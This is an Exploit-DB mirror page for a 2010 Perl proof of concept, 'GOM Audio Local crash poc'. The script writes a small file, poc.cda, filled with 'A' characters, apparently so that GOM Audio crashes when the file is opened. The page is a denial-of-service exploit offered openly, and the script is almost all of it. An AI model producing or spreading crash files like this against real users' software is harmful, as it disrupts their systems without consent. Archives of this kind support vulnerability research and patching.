exploit-db-mirror/exploits/windows/dos/11020.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

11 lines
No EOL
259 B
Perl
Executable file

# Exploit Title: [GOM Audio Local crash poc]
# Date: [2010.01.05]
# Author: [applicationlayer@gmail.com]
# Version: [all versions]
# Tested on: [xp sp3]
#!usr/bin/perl
$file="poc.cda";
$boom="A" x 10;
open(myfile,">>$file");
print myfile $boom;
close(myfile);